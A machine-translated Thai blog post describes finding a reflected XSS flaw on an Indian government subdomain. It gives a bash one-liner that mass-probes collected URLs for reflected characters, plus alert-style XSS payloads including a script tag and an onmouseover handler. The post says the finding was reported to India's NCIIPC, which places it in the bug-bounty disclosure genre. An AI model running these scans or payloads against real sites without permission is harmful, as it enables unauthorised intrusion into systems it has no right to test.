ฉันพบ Reflected XSS ใน *.GOV.IN ได้อย่างไร

May 02 2023
บล็อกนี้จะช่วยคุณค้นหาพารามิเตอร์ที่มีช่องโหว่ทั้งหมดในเว็บแอปพลิเคชัน นอกจากนี้ยังจะสอนวิธีใช้ประโยชน์จากช่องโหว่เช่น XSS และ SQLI โดยการเข้าถึงเว็บไซต์ใดๆ

บล็อกนี้จะช่วยคุณค้นหาพารามิเตอร์ที่มีช่องโหว่ทั้งหมดในเว็บแอปพลิเคชัน นอกจากนี้ยังจะสอนวิธีใช้ประโยชน์จากช่องโหว่เช่น XSS และ SQLI โดยการเข้าถึงเว็บไซต์ใดๆ

XSS สะท้อนอะไร:

การสะท้อนกลับของสคริปต์ข้ามไซต์ (หรือ XSS) เป็นช่องโหว่ด้านความปลอดภัยที่เกิดขึ้นเมื่อแอปพลิเคชันได้รับข้อมูลในคำขอ HTTP และจัดเก็บไว้ในการตอบสนองโดยไม่ได้กรองและฆ่าเชื้ออย่างเหมาะสม

ให้ย้ายทีละขั้นตอน:

เลือกโดเมน: *.gov.in

ขั้นตอนที่ 1: ค้นหาโดเมนย่อยที่เป็นไปได้ทั้งหมดภายใต้โดเมนที่เลือก

ขั้นตอนที่ 2: เลือกโดเมนย่อยใดก็ได้

ขั้นตอนที่ 3: ค้นหาพารามิเตอร์ที่เป็นไปได้ทั้งหมดโดยใช้เครื่องมือเช่นParamspider

ขั้นตอนที่ 4: ตรวจสอบ URL ทั้งหมดที่แสดงถึงอักขระพิเศษโดยตรง

หากต้องการทำให้เป็นอัตโนมัติ ให้ใช้สคริปต์ด้านล่าง:

cat urls.txt| egrep -iv ".(jpg|jpeg|js|css|gif|tif|tiff|png|woff|woff2|ico|pdf|svg|txt)" | qsreplace '"><()'| tee combinedfuzz.json && cat combinedfuzz.json | while read host do ; do curl --silent --path-as-is --insecure "$host" | grep -qs "\"><()" && echo -e "$host \033[91m Vullnerable \e[0m \n" || echo -e "$host  \033[92m Not Vulnerable \e[0m \n"; done | tee XSS.txt

      
                

ขั้นตอนที่ 5: ลองใช้ด้วยตนเองทันที:

ให้ลองโหลด XSS พื้นฐาน:

"><script>alert(1);</script>

ป้อนน้ำหนักบรรทุก

ไม่มีป๊อปอัป:

ให้เริ่มต้นจากจุดเริ่มต้น:

เพียงลองด้วย: คำพูดเดียว

'

      
                
No Errors

ตอนนี้ลองกับเหตุการณ์บางอย่าง:

' onmouseover=alert(1);>

      
                

ให้ดูซอร์สโค้ด:

เราได้ XSS แล้ว ตอนนี้รายงานไปที่ NCIIPC

ติดต่อ:

https://www.linkedin.com/in/prince-prafull-19a477194/